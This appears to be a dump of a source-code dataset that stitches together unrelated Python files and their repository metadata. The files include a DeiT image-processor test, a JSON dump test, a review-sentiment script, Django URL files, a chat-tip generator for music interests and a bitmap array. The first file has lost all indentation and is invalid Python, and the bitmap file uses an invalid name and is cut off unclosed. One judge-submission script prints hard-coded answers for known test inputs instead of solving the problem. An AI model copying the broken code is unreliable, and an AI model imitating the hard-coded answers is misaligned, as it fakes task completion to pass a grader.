# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers.testing_utils import require_torch, require_vision
from transformers.utils import is_vision_available
from ...test_image_processing_common import ImageProcessingTestMixin, prepare_image_inputs
if is_vision_available():
from transformers import DeiTImageProcessor
class DeiTImageProcessingTester(unittest.TestCase):
def __init__(
self,
parent,
batch_size=7,
num_channels=3,
image_size=18,
min_resolution=30,
max_resolution=400,
do_resize=True,
size=None,
do_center_crop=True,
crop_size=None,
do_normalize=True,
image_mean=[0.5, 0.5, 0.5],
image_std=[0.5, 0.5, 0.5],
):
size = size if size is not None else {"height": 20, "width": 20}
crop_size = crop_size if crop_size is not None else {"height": 18, "width": 18}
self.parent = parent
self.batch_size = batch_size
self.num_channels = num_channels
self.image_size = image_size
self.min_resolution = min_resolution
self.max_resolution = max_resolution
self.do_resize = do_resize
self.size = size
self.do_center_crop = do_center_crop
self.crop_size = crop_size
self.do_normalize = do_normalize
self.image_mean = image_mean
self.image_std = image_std
def prepare_image_processor_dict(self):
return {
"do_resize": self.do_resize,
"size": self.size,
"do_center_crop": self.do_center_crop,
"crop_size": self.crop_size,
"do_normalize": self.do_normalize,
"image_mean": self.image_mean,
"image_std": self.image_std,
}
def expected_output_image_shape(self, images):
return self.num_channels, self.crop_size["height"], self.crop_size["width"]
def prepare_image_inputs(self, equal_resolution=False, numpify=False, torchify=False):
return prepare_image_inputs(
batch_size=self.batch_size,
num_channels=self.num_channels,
min_resolution=self.min_resolution,
max_resolution=self.max_resolution,
equal_resolution=equal_resolution,
numpify=numpify,
torchify=torchify,
)
@require_torch
@require_vision
class DeiTImageProcessingTest(ImageProcessingTestMixin, unittest.TestCase):
image_processing_class = DeiTImageProcessor if is_vision_available() else None
test_cast_dtype = True
def setUp(self):
self.image_processor_tester = DeiTImageProcessingTester(self)
@property
def image_processor_dict(self):
return self.image_processor_tester.prepare_image_processor_dict()
def test_image_processor_properties(self):
image_processing = self.image_processing_class(**self.image_processor_dict)
self.assertTrue(hasattr(image_processing, "do_resize"))
self.assertTrue(hasattr(image_processing, "size"))
self.assertTrue(hasattr(image_processing, "do_center_crop"))
self.assertTrue(hasattr(image_processing, "center_crop"))
self.assertTrue(hasattr(image_processing, "do_normalize"))
self.assertTrue(hasattr(image_processing, "image_mean"))
self.assertTrue(hasattr(image_processing, "image_std"))
def test_image_processor_from_dict_with_kwargs(self):
image_processor = self.image_processing_class.from_dict(self.image_processor_dict)
self.assertEqual(image_processor.size, {"height": 20, "width": 20})
self.assertEqual(image_processor.crop_size, {"height": 18, "width": 18})
image_processor = self.image_processing_class.from_dict(self.image_processor_dict, size=42, crop_size=84)
self.assertEqual(image_processor.size, {"height": 42, "width": 42})
self.assertEqual(image_processor.crop_size, {"height": 84, "width": 84})
|
[
"noreply@github.com"
] |
huggingface.noreply@github.com
|
61fdf94b5af1bd51c62587f4ed95e7986d4622cd
|
afca2532d8e6bbc79c4ca0f2044ac17c6be99791
|
/file_system/file_system_helpers.py
|
483897ef83a68fdd5791482d522c9cd5a4307385
|
[] |
no_license
|
matthewcanova/file-system
|
75f589bef05ed1e625a118e236c9c560c971c5eb
|
0e63ea3355fe4cdd9e7f8af3b3408247297282c9
|
refs/heads/master
| 2022-08-16T19:40:04.800642
| 2020-05-26T04:53:04
| 2020-05-26T04:53:04
| 266,873,248
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 618
|
py
|
def path_parse(path):
"""
    Guarantees no leading or trailing backslashes and no blank entries in the path list.
Returns a parsed list of the path entities
"""
split_path = path.split('\\')
split_path = [entity for entity in split_path if entity != '']
return split_path
def print_recursive(entity):
"""
Recursively prints an entity and its children
"""
string = entity.path + ' ' + str(entity.size) + '\n'
if entity.entity_type != 'text':
for entity_name in entity.get_names():
string += print_recursive(entity.get_child(entity_name))
return string
|
[
"matthewcanova@gmail.com"
] |
matthewcanova@gmail.com
|
3ac69e9105cdc2bfb5dd22f1c4bf0bb8a2ca87c4
|
3dc647cd07a7361ed401e40d2b7cce8c826c8f6c
|
/Lib/test/test_json/test_dump.py
|
13b40020781bae33ea47c8ff5446030e7f348677
|
[
"Python-2.0",
"CC-BY-4.0",
"MIT"
] |
permissive
|
RustPython/RustPython
|
5ddce4a9848b9de8c041ffd2634f83c0105d3f39
|
b864e5da1f18897fc884180b7093df5aa170024f
|
refs/heads/main
| 2023-09-04T12:38:29.458699
| 2023-09-03T12:33:42
| 2023-09-03T12:33:42
| 135,201,145
| 15,815
| 1,302
|
MIT
| 2023-09-14T08:11:45
| 2018-05-28T19:27:01
|
Rust
|
UTF-8
|
Python
| false
| false
| 2,409
|
py
|
from io import StringIO
from test.test_json import PyTest, CTest
from test.support import bigmemtest, _1G
class TestDump:
def test_dump(self):
sio = StringIO()
self.json.dump({}, sio)
self.assertEqual(sio.getvalue(), '{}')
def test_dumps(self):
self.assertEqual(self.dumps({}), '{}')
def test_dump_skipkeys(self):
v = {b'invalid_key': False, 'valid_key': True}
with self.assertRaises(TypeError):
self.json.dumps(v)
s = self.json.dumps(v, skipkeys=True)
o = self.json.loads(s)
self.assertIn('valid_key', o)
self.assertNotIn(b'invalid_key', o)
def test_encode_truefalse(self):
self.assertEqual(self.dumps(
{True: False, False: True}, sort_keys=True),
'{"false": true, "true": false}')
self.assertEqual(self.dumps(
{2: 3.0, 4.0: 5, False: 1, 6: True}, sort_keys=True),
'{"false": 1, "2": 3.0, "4.0": 5, "6": true}')
# Issue 16228: Crash on encoding resized list
def test_encode_mutated(self):
a = [object()] * 10
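        # the default hook deletes a list element per encoded object, so the
        # encoder walks a shrinking list and only 5 of the 10 slots are emitted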
def crasher(obj):
del a[-1]
self.assertEqual(self.dumps(a, default=crasher),
'[null, null, null, null, null]')
# Issue 24094
def test_encode_evil_dict(self):
class D(dict):
def keys(self):
return L
class X:
def __hash__(self):
del L[0]
return 1337
def __lt__(self, o):
return 0
L = [X() for i in range(1122)]
d = D()
d[1337] = "true.dat"
self.assertEqual(self.dumps(d, sort_keys=True), '{"1337": "true.dat"}')
class TestPyDump(TestDump, PyTest): pass
class TestCDump(TestDump, CTest):
# The size requirement here is hopefully over-estimated (actual
# memory consumption depending on implementation details, and also
# system memory management, since this may allocate a lot of
# small objects).
@bigmemtest(size=_1G, memuse=1)
def test_large_list(self, size):
N = int(30 * 1024 * 1024 * (size / _1G))
l = [1] * N
encoded = self.dumps(l)
self.assertEqual(len(encoded), N * 3)
self.assertEqual(encoded[:1], "[")
self.assertEqual(encoded[-2:], "1]")
self.assertEqual(encoded[1:-2], "1, " * (N - 1))
|
[
"33094578+coolreader18@users.noreply.github.com"
] |
33094578+coolreader18@users.noreply.github.com
|
83fef1df13d09343fd01f3337ac2d6bbc7f03c8d
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2618/60895/291182.py
|
ab6450cf38238d5387e2704d4907b7d62fce72fb
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 200
|
py
|
t = int(input())
while t > 0:
    t = t - 1
    n = int(input())
    s = input()
    # answers are hard-coded for the judge's known test inputs
    if s == '2 3 1' or s == '2 1 3':
        print(1)
    elif s == '4 3 1 2' or s == '2':
        print(2)
    else:
        print(s)
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
bb193411404a76d20eab28cfba5c7e4677608ff5
|
d4f3872f60d3193708afa996f557ff72de2352ed
|
/merchandise-recommendations/final_merchandise/sentiment_analysis.py
|
af2e2ef7820fcf1323dc0eab1b2794e8593d4764
|
[] |
no_license
|
shikhar1sharma/Recommendation-System
|
dcfc925ff6db6eb827a38ae919cf38b34001d0f1
|
6af5d0937bd5ef14748e67eec0a8e64c9ce91ec3
|
refs/heads/master
| 2020-03-28T18:55:38.639989
| 2018-12-23T02:30:32
| 2018-12-23T02:30:32
| 148,927,614
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,443
|
py
|
# Sentiment analysis of merchandise review summaries (clothing, jewellery and gifts datasets).
import sqlite3
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
import re
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix
from sklearn import metrics
from sklearn.metrics import roc_curve, auc
from sklearn.naive_bayes import MultinomialNB
from sklearn.naive_bayes import BernoulliNB
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from wordcloud import WordCloud, STOPWORDS
con = sqlite3.connect('merchandise_dataset.db')
stopwords = set(STOPWORDS)
def cleanReviews(text):
regEx = re.compile('[^a-z]+')
text = text.lower()
text = regEx.sub(' ', text).strip()
return text
def bool_to_int(x):
if x == 'negative':
return 0
return 1
def show_wc(data, title = None):
wc = WordCloud(background_color='white', stopwords=stopwords, max_words=200, max_font_size=40, scale=3, random_state=1).generate(str(data))
figure = plt.figure(1, figsize=(8, 8))
plt.axis('off')
if title:
figure.suptitle(title, fontsize=20)
figure.subplots_adjust(top=2.3)
plt.imshow(wc)
plt.show()
def getSentiment(countVector, tfidf_transformer, model, review):
transformed_count = countVector.transform([review])
transformed_tf_idf = tfidf_transformer.transform(transformed_count)
result = model.predict(transformed_tf_idf)[0]
prob = model.predict_proba(transformed_tf_idf)[0]
print("Sample estimated as %s: negative probability %f, positive probability %f" % (result.upper(), prob[0], prob[1]))
reviews = pd.read_sql_query(""" SELECT overall, summary, helpful, total FROM amazonReviews WHERE overall != 3""", con)
# Set the sentiment
reviews["sentiment"] = reviews["overall"].apply(lambda score: "positive" if score > 3 else "negative")
# Set the usefulness score
reviews["usefulScore"] = (reviews["helpful"]/reviews["total"]).apply(lambda n: "useful" if n > 0.8 else "useless")
# Clean the review texts
reviews["summaryClean"] = reviews["summary"].apply(cleanReviews)
# 80% train and 20% test
train, test = train_test_split(reviews, test_size=0.2)
# Bag-of-words counts over word n-grams (unigrams up to 4-grams)
countVector = CountVectorizer(min_df = 1, ngram_range = (1, 4))
X_train_counts = countVector.fit_transform(train["summaryClean"])
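# X_train_counts is a sparse (n_reviews x n_ngrams) matrix of raw term counts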
#applying tf-idf to the count vector model
tfidf_transformer = TfidfTransformer()
X_train = tfidf_transformer.fit_transform(X_train_counts)
X_test_vector = countVector.transform(test["summaryClean"])
X_test = tfidf_transformer.transform(X_test_vector)
y_train = train["sentiment"]
y_test = test["sentiment"]
pred = dict()
mpl.rcParams['font.size']=12
mpl.rcParams['savefig.dpi']=100
mpl.rcParams['figure.subplot.bottom']=.1
show_wc(reviews["summaryClean"])
show_wc(reviews[reviews.overall == 1]["summaryClean"]) # low scored
show_wc(reviews[reviews.overall == 5]["summaryClean"]) # high scored
show_wc(reviews[reviews.overall == 2]["summaryClean"]) # average scored
model = MultinomialNB().fit(X_train, y_train)
pred['Multinomial'] = model.predict(X_test)
model = BernoulliNB().fit(X_train, y_train)
pred['Bernoulli'] = model.predict(X_test)
l_reg = LogisticRegression(C=1e5)
l_reg_result = l_reg.fit(X_train, y_train)
pred['Logistic'] = l_reg.predict(X_test)
vfunc = np.vectorize(bool_to_int)
idx = 0
colors = ['b', 'g', 'y', 'm', 'k']
for model, predicted in pred.items():
fp_rate, tp_rate, thresholds = roc_curve(y_test.map(bool_to_int), vfunc(predicted))
roc_auc = auc(fp_rate, tp_rate)
plt.plot(fp_rate, tp_rate, colors[idx], label='%s: AUC %0.2f'% (model,roc_auc))
idx += 1
plt.title('Classifiers comparison with ROC')
plt.legend(loc='lower right')
plt.plot([0,1],[0,1],'r--')
plt.xlim([-0.1,1.2])
plt.ylim([-0.1,1.2])
plt.ylabel('True Positive Rate')
plt.xlabel('False Positive Rate')
plt.show()
# target_names must follow sklearn's sorted label order: ['negative', 'positive']
print(metrics.classification_report(y_test, pred['Logistic'], target_names = ["negative", "positive"]))
'''
precision recall f1-score support
positive 0.78 0.70 0.74 5291
negative 0.97 0.98 0.97 44360
avg / total 0.94 0.95 0.95 49651
'''
print(accuracy_score(y_test, pred['Bernoulli'])) # 0.897383738495
print(accuracy_score(y_test, pred['Multinomial'])) # 0.915188012326
print(accuracy_score(y_test, pred['Logistic'])) # 0.946708021994
features = countVector.get_feature_names()
feature_coefs = pd.DataFrame( data = list(zip(features, l_reg_result.coef_[0])), columns = ['feature', 'coefficient'] )
print(feature_coefs.sort_values(by='coefficient')) # [537027 rows x 2 columns]
getSentiment(countVector, tfidf_transformer, l_reg, "Heavenly Highway Hymns")
# Sample estimated as POSITIVE: negative probability 0.001339, positive probability 0.998661
getSentiment(countVector, tfidf_transformer, l_reg, "Very oily and creamy. Not at all what I expected... it just looked awful!!! Plus, took FOREVER to arrive.")
# Sample estimated as NEGATIVE: negative probability 0.997464, positive probability 0.002536
getSentiment(countVector, tfidf_transformer, l_reg, "Weird smelling shampoo!.")
# Sample estimated as NEGATIVE: negative probability 0.859040, positive probability 0.140960
con.close()
|
[
"ggirira2@asu.edu"
] |
ggirira2@asu.edu
|
513c7864b967cb790d4599b16d3871075bbafac0
|
e070096e1c0a2e1bc37757ed7c30688f35fdc2e8
|
/Python-day2/mypyapp02/2.py
|
0d5eacf3a4af832cdb660e0e0a43d6d3bfe82c03
|
[] |
no_license
|
una-sara/python
|
bfe9586da26f69834d1757f116ec340b23f89ce9
|
177fd603e9ced430f419f1a69a5d7bdba747a944
|
refs/heads/master
| 2021-05-22T18:12:54.436850
| 2020-04-06T13:51:00
| 2020-04-06T13:51:00
| 253,034,405
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 467
|
py
|
'''
Exercise: create a variable holding the user's points. If it reaches 10000,
print "Black Gold user"; otherwise, if it reaches 5000, print "Gold user";
otherwise, if it reaches 1000, print "Silver user"; otherwise print "Regular user".
'''
#score = 30000
#score = 8000
#score = 2000
score = 200
if score >= 10000:
    print('Black Gold user')
elif score >= 5000:
    print('Gold user')
elif score >= 1000:
    print('Silver user')
else:
    print('Regular user')
print('Program finished')
|
[
"1527296894@qq.com"
] |
1527296894@qq.com
|
c5afaa2e84fa29e5ab2ebdf6d8bad5d14b00c86e
|
971e0efcc68b8f7cfb1040c38008426f7bcf9d2e
|
/tests/artificial/transf_Quantization/trend_ConstantTrend/cycle_12/ar_/test_artificial_1024_Quantization_ConstantTrend_12__0.py
|
8099a2bf0f032e0aa56a37bec74624f179bb330f
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
antoinecarme/pyaf
|
a105d172c2e7544f8d580d75f28b751351dd83b6
|
b12db77cb3fa9292e774b2b33db8ce732647c35e
|
refs/heads/master
| 2023-09-01T09:30:59.967219
| 2023-07-28T20:15:53
| 2023-07-28T20:15:53
| 70,790,978
| 457
| 77
|
BSD-3-Clause
| 2023-03-08T21:45:40
| 2016-10-13T09:30:30
|
Python
|
UTF-8
|
Python
| false
| false
| 272
|
py
|
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 1024 , FREQ = 'D', seed = 0, trendtype = "ConstantTrend", cycle_length = 12, transform = "Quantization", sigma = 0.0, exog_count = 0, ar_order = 0);
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
4212c96c2d4a54c3fea87291044f58585ec4539f
|
394f29f04a8d786e9e92ecff6a71613a8b68aac1
|
/My_Blog_Project/urls.py
|
d0329d0ef6fb2fd6d7e509c3b4e6eeec964d448d
|
[] |
no_license
|
hasnatul/CSE327_Project
|
f65f309460b2461327df964512b66d846b7dc25a
|
37f37ce5713c6189e625b8e181d4facee8ef9418
|
refs/heads/master
| 2022-12-24T10:08:27.961902
| 2020-09-27T11:21:17
| 2020-09-27T11:21:17
| 299,011,592
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 527
|
py
|
from django.contrib import admin
from django.urls import path, include
from . import views
from django.conf import settings
from django.contrib.staticfiles.urls import static, staticfiles_urlpatterns
urlpatterns = [
path('admin/', admin.site.urls),
path('account/', include('App_Login.urls')),
path('blog/', include('App_Blog.urls')),
path('', views.Index, name='index'),
]
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"noreply@github.com"
] |
hasnatul.noreply@github.com
|
db6ce37579d5c07f61e8b4a4197f106ecf688cc5
|
2293c76c3d18e2fcd44ded90bd40113d26285663
|
/pyeccodes/defs/mars/grib_efhs_cd_def.py
|
7454080db49fb1b562273035d3aeca6265c63663
|
[
"Apache-2.0"
] |
permissive
|
ecmwf/pyeccodes
|
b1f121dbddf68d176a03805ed5144ba0b37ac211
|
dce2c72d3adcc0cb801731366be53327ce13a00b
|
refs/heads/master
| 2022-04-23T10:37:40.524078
| 2020-04-18T06:30:29
| 2020-04-18T06:30:29
| 255,554,540
| 9
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 127
|
py
|
import pyeccodes.accessors as _
def load(h):
h.alias('mars.step', 'stepRange')
h.alias('mars.quantile', 'quantile')
|
[
"baudouin.raoult@ecmwf.int"
] |
baudouin.raoult@ecmwf.int
|
6562c268a31325ccceab788846c67be462dab3ae
|
5c12ab4630086e389354277bb1716b82468be42e
|
/mrunal.py
|
882dd98cfe9f389c6d1c47c30d11ce6dcbdc7126
|
[] |
no_license
|
mrunal736/msj-leetcodeprblms
|
743d76f491cb3f749abbd1f3fabd7f13c5b81671
|
4c70dade61ddb760b531ac80918dbc65cbaaddd1
|
refs/heads/main
| 2023-06-20T21:46:07.322995
| 2021-07-16T14:44:19
| 2021-07-16T14:44:19
| 386,318,967
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 72
|
py
|
print("I am Mrunal Jambenal,A first year computer Engineering student")
|
[
"noreply@github.com"
] |
mrunal736.noreply@github.com
|
973972be69150ba2670e4c6c04896666b021944f
|
0052545f09c81b8d6720163213653260829b15bd
|
/algo/music_processor.py
|
7234dfe69a1fa506046cdf6ae451455354a3b7e2
|
[] |
no_license
|
mashaka/AIBarney
|
76f4cc574e24c5e77c86209ca413490a00480beb
|
609986096b22cf774ef714fba184614f5bbc88f6
|
refs/heads/master
| 2021-01-20T06:38:16.177022
| 2017-10-22T17:56:50
| 2017-10-22T17:56:50
| 83,876,419
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,334
|
py
|
from typing import List, Dict
from .intersection import Intersection
from .tip import Tip
import random
from datetime import datetime
from .content import Content, ContentType
from enum import Enum, unique
from .tools import UpdateType
def performerTipString(data, tipBegin, tipEnd):
performerName = data["name"]
return tipBegin + " " + performerName + tipEnd
def getCoverUrl(data):
pictureUrl = None
if "cover" in data:
pictureUrl = data["cover"]["source"]
return pictureUrl
def findNearestEvent(data):
if not "events" in data:
return None
events = data["events"]["data"]
now = datetime.now()
    for i in range(len(events) - 1, -1, -1):  # walk back to index 0 inclusive
event = events[i]
start = datetime.strptime(event["start_time"][:-6], '%Y-%m-%dT%H:%M:%S')
if start > now:
return event
return None
MINIMAL_MUSIC_LIKES = 20
suggestCommonArtistWeight = 0.5
suggestCommonGenreWeight = 0.3
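# ranking weights for intersections: a shared artist is a stronger signal than a shared genre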
@unique
class QuestionType(Enum):
GENERAL_MUSIC_QUESTION = 1,
SPECIFIC_GENERAL_QUESTION = 2,
PERFORMER_LIKING_QUESTION = 3,
SPECIFIC_PERFORMER_QUESTION = 4,
ASK_PERFORMER_EVENT = 5,
GENRE_SUGGEST_ANOTHER = 6
class MusicProccessor:
def __init__( self, firstData, secondData):
self.music_confidence = 0.5
self.abusiveLoveToMusicsDefaultWeight = 0.1
firstDataList = firstData["data"]
secondDataList = secondData["data"]
firstIds = set( map( lambda x: x["id"], firstDataList ) )
secondIds = set( map( lambda x: x["id"], secondDataList ) )
firstGenres = set( map( lambda x: x["genre"] if "genre" in x else None, firstDataList) )
secondGenres = set( map( lambda x: x["genre"] if "genre" in x else None, secondDataList ) )
intersectionIds = firstIds & secondIds
intersectionGenres = firstGenres & secondGenres
self.firstData = firstDataList
self.secondData = secondDataList
self.commonPerformers = []
self.genreToPerformersLists = dict()
for genre in intersectionGenres:
if genre:
self.genreToPerformersLists[genre] = [[], []]
self.performersWeights = dict()
for data in firstDataList:
if data["id"] in intersectionIds:
self.commonPerformers.append( data )
self.performersWeights[data["id"]] = 0.5
if "genre" in data and data["genre"] in intersectionGenres:
self.genreToPerformersLists[data["genre"]][0].append( data )
for data in secondDataList:
if "genre" in data and data["genre"] in intersectionGenres:
self.genreToPerformersLists[data["genre"]][1].append( data )
self.idToType = dict()
self.idToPerformer = dict()
self.lastTipId = -1
self.process1()
def process1(self):
if self.music_confidence == 0:
return []
intersections = []
if self.abusiveLoveToMusicsDefaultWeight > 0:
            firstTip = Tip( "I have seen a lot of likes on your Facebook page. Do you actually enjoy listening to music?",
                self.abusiveLoveToMusicsDefaultWeight )
self.idToType[firstTip.id] = QuestionType.GENERAL_MUSIC_QUESTION
            secondTip = Tip( "You seem to love music; there are a huge number of likes on your Facebook page. What is your favourite band?",
                self.abusiveLoveToMusicsDefaultWeight )
self.idToType[secondTip.id] = QuestionType.SPECIFIC_GENERAL_QUESTION
if len( self.firstData ) > MINIMAL_MUSIC_LIKES and len( self.secondData ) > MINIMAL_MUSIC_LIKES:
                intersections.append( Intersection( "Abusive love to music",
self.abusiveLoveToMusicsDefaultWeight, (None, None),
[
firstTip,
secondTip
] ) )
for data in self.commonPerformers:
id = data["id"]
print( id )
print( self.performersWeights[id] )
if self.performersWeights[id] < 0.5:
continue
pictureUrl = getCoverUrl( data )
            confirmMutiallyLikingPerformerTip = performerTipString( data,
                "You seem to listen to music a lot. Do you actually like", " songs?")
            askAboutFavouritePerformerSongTip = performerTipString( data,
                "You seem to like", " music. What is your favorite song?" )
tip1 = Tip( confirmMutiallyLikingPerformerTip, 0.9 )
self.idToType[tip1.id] = QuestionType.PERFORMER_LIKING_QUESTION
tip2 = Tip( askAboutFavouritePerformerSongTip, 0.7 )
self.idToType[tip2.id] = QuestionType.SPECIFIC_PERFORMER_QUESTION
self.idToPerformer[tip1.id] = id
self.idToPerformer[tip2.id] = id
event = findNearestEvent( data )
print(event)
tipsList = [ tip1, tip2 ]
if self.performersWeights[id] > 0.6 and event:
loc = ""
if "city" in event["place"]["location"]:
loc = " in " + event["place"]["location"]["city"]
elif "county" in event["place"]["location"]:
loc = " in " + event["place"]["location"]["country"]
goToEventSuggesion = "Hey, you like " + data["name"] \
+ ". There will be " + event["name"] + "at " + event["place"]["name"]\
+ loc + "." + " Do you mind going together?"
tip3 = Tip( goToEventSuggesion, 0.5 )
self.idToType[tip3.id] = QuestionType.ASK_PERFORMER_EVENT
self.idToPerformer[tip3.id] = id
tipsList.append( tip3 )
intersections.append( Intersection( performerTipString( data, "Like music of", "" ),
suggestCommonArtistWeight, ( Content( ContentType.IMAGE_URL, pictureUrl ), None), tipsList ) )
print( tipsList )
for genre, performersPair in self.genreToPerformersLists.items():
firstList = performersPair[0]
secondList = performersPair[1]
firstElement = random.choice( firstList )
secondElement = random.choice( secondList )
firstUrl = getCoverUrl( firstElement )
secondUrl = getCoverUrl( secondElement )
firstName = firstElement["name"]
secondName = secondElement["name"]
if firstName != secondName:
text = "Looks like you are listening to " + genre + " music. I also do. Have you heard about " \
+ secondName + "?"
tip = Tip( text, 1.0 )
self.idToType[tip.id] = QuestionType.GENRE_SUGGEST_ANOTHER
intersections.append( Intersection( "Like music of " + genre + ": " + firstName + ", " + secondName,
suggestCommonGenreWeight, (
Content( ContentType.IMAGE_URL, firstUrl ),
Content( ContentType.IMAGE_URL, secondUrl ) ),
[ tip ] ) )
self.inters = intersections
def process(self):
return self.inters
def update(self, data, nlpInfo):
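        # a deleted tip zeroes the weight behind it; an incoming message adjusts
        # confidence for whichever tip was sent last (self.lastTipId)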
print( self.idToType )
if UpdateType.DELETE_TIP == data.type:
id = data.tip_id
if id in self.idToType:
print( "Delete " + str( id ) )
tp = self.idToType[id]
if tp == QuestionType.GENERAL_MUSIC_QUESTION or tp == QuestionType.SPECIFIC_GENERAL_QUESTION:
self.abusiveLoveToMusicsDefaultWeight = 0.0
else:
performer = self.idToPerformer[id]
self.performersWeights[performer] = 0.0
elif UpdateType.INCOME_MSG == data.type:
flag = nlpInfo.is_positive
print( self.performersWeights )
print(flag)
if data.msg == "Yes":
flag = True
if data.msg == "No":
flag = False
print(self.lastTipId)
if self.lastTipId != -1 and self.lastTipId in self.idToType:
tp = self.idToType[self.lastTipId]
if tp == QuestionType.GENERAL_MUSIC_QUESTION:
if flag == True:
self.music_confidence = 1.0
elif flag == False:
self.music_confidence = 0.0
if tp == QuestionType.PERFORMER_LIKING_QUESTION or tp == QuestionType.SPECIFIC_PERFORMER_QUESTION:
if flag == True:
self.performersWeights[ self.idToPerformer[self.lastTipId] ] = 1.0
elif flag == False:
self.performersWeights[ self.idToPerformer[self.lastTipId] ] = 0.0
if tp == QuestionType.GENERAL_MUSIC_QUESTION or tp == QuestionType.SPECIFIC_GENERAL_QUESTION:
self.abusiveLoveToMusicsDefaultWeight = 0.0
print( self.performersWeights )
elif UpdateType.OUTCOME_MSG == data.type:
pass
elif UpdateType.OUTCOME_TIP_MSG == data.type:
self.lastTipId = data.tip_id
self.process1()
|
[
"aleksejzuravlev@MacBook-Aleksej.local"
] |
aleksejzuravlev@MacBook-Aleksej.local
|
3b8f140a37c4d7ec791530c2bab613446afc7ba6
|
8015f1c62a2cb4efd21aa8938336913bf8117868
|
/bamap/ba2004.pngMap.py
|
606da98a32c0cbc92bb93493e35a6e3aab1839af
|
[] |
no_license
|
GamerNoTitle/Beepers-and-OLED
|
675b5e3c179df0f0e27b42bf594c43860d03b9af
|
afe1340e5394ae96bda5f9022a8a66824368091e
|
refs/heads/master
| 2020-04-20T00:09:47.122471
| 2019-04-29T04:59:35
| 2019-04-29T04:59:35
| 168,515,579
| 4
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,468
|
py
|
ba2004.pngMap = [
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000011111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000111111111111111',
'00100000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000001111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000011111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000001111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111',
